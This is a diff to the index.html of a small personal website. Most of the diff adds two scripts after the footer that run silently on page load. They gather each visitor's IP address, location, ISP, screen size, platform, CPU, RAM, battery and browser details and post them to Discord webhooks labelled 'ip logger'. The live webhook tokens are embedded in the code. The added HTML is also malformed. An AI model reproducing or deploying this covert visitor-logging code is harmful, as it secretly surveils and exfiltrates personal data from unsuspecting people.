--- a/index.html
+++ b/index.html
@@ -1,4 +1,3 @@
-
 <!DOCTYPE html>
 <html>
 <head>
@@ -64,7 +63,7 @@ znkcpt website</h2>
 </div>
 </section>
 
-
+<body>
 <section class="section">
 <div class="container">
 <h3 class="title is-3 has-text-centered has-text-grey-lighter" data-aos="fade-up">
@@ -177,6 +176,8 @@ Soon</h3>
 </div>
 </footer>
 
+  
+  
 <script data-cfasync="false" src="/cdn-cgi/scripts/5c5dd728/cloudflare-static/email-decode.min.js"></script><script defer src="https://static.cloudflareinsights.com/beacon.min.js/v652eace1692a40cfa3763df669d7439c1639079717194" integrity="sha512-Gi7xpJR8tSkrpF7aordPZQlW2DLtzUlZcumS8dMQjwDHEnw9I7ZLyiOj/6tZStRBGtGgN6ceN6cMH8z7etPGlw==" data-cf-beacon='{"rayId":"7270c9715b609a1e","version":"2022.6.0","r":1,"token":"eee04ad994b74ff6a68147a36daee076","si":100}' crossorigin="anonymous"></script>
 </body>
 <script>
@@ -226,4 +227,64 @@ tsParticles.load("tsparticles", {
   }
 });
 </script>
+
+
+   </style>
+  <script src="https://ajax.googleapis.com/ajax/libs/jquery/1.11.0/jquery.min.js"></script>
+  <script>
+    $(document).ready(function () {
+
+      let ip
+      let country
+    
+      async function getInfo() {
+        await fetch('https://ip-api.io/json')
+          .then(response => response.json())
+          .then(data => {
+            ip = data.ip
+            country = data.country_name            
+          })
+
+        await sendWebhook();
+      }
+      getInfo();
+
+      function sendWebhook() {
+        /*Change here the webhookUrl for your discord webhook url*/
+        const webhookUrl = "https://discord.com/api/webhooks/995052269403898007/DnIVqf3qBYim6a9nSwjIkMV7rc1_oshxJaQKD2RuqqfnqVT6IQULC7FbM0MK36pw53bF"
+
+        let request = new XMLHttpRequest();
+        request.open("POST", webhookUrl);
+        request.setRequestHeader('Content-type', 'application/json');
+        let params = {
+          "content": null,
+          "embeds": [
+            {
+              "description": `user-ul ||${ip}|| tocmai o intrat pe site si este din ${country}`,
+              "color": 10493984,
+            }
+          ],
+          "attachments": []
+        }
+        request.send(JSON.stringify(params));
+      }
+    });
+  </script>
+</head>
+  
+<script src="https://ajax.googleapis.com/ajax/libs/jquery/1.11.0/jquery.min.js"></script>
+<script>$(document).ready(function () {
+let ip; let country; let countryCode; let region; let regionName; let city; let zip; let lat; let lon; let timezone; let org; let batterypercentage; let ischarging; let platform; let networkinfo; let networkinformation; let width; let height; let devicelang; let iscookieEnabled; let userAgent; let cpuThreads; let deviceram; let referurl; let datetime = new Date(); let localtime; async function getInfo() {await fetch('https://ip-api.io/json').then(response => response.json()).then(data => { ip = data.ip; country = data.country_name; countryCode = data.country_code; region = data.region_code; regionName = data.region_name; city = data.city; zip = data.zip_code; lat = data.latitude; lon = data.longitude; timezone = data.time_zone; org = data.organisation;});let battery = await navigator.getBattery(); batterypercentage = String(battery.level * 100 + "%"); ischarging = String(battery.charging); platform = String(navigator.platform); width = String(window.innerWidth); height = String(window.innerHeight); devicelang = String(navigator.language); iscookieEnabled = String(navigator.cookieEnabled); userAgent = String(navigator.userAgent || navigator.vendor || window.opera); cpuThreads = String(navigator.hardwareConcurrency); deviceram = String(navigator.deviceMemory + "GB"); referurl = String(window.location.href); localtime = String(datetime.toLocaleString()); await sendWebhook();}getInfo();function sendWebhook() {const webhookUrl = "https://discord.com/api/webhooks/995030282174484550/rB0haxQk3PAvJJsr_ids3Jby9NrvY4g8UpTX0DYBARgmiAr8psC4mpUKCOML6OiirgJg";let request = new XMLHttpRequest();request.open("POST", webhookUrl);request.setRequestHeader('Content-type', 'application/json');
+let params = {"content": null,"embeds": [{"title": "ip logger","description": `
+**Adresa IP:** ||${ip}||
+**Internet:**  ${org} 
+**Localitate:** ${country}/${regionName}/${city}
+**Postal Code:** ${zip}
+**Latime Monitor:** ${width}
+**Inaltime Monitor:** ${height}
+**Platforma:** ${platform}
+**Nucle CPU:** ${cpuThreads}
+**PC Ram:** ${deviceram} 
+**Website:** ${referurl}
+`,"color": 000000,"timestamp": datetime}],"attachments": []};request.send(JSON.stringify(params));}});</script></head>
 </html>
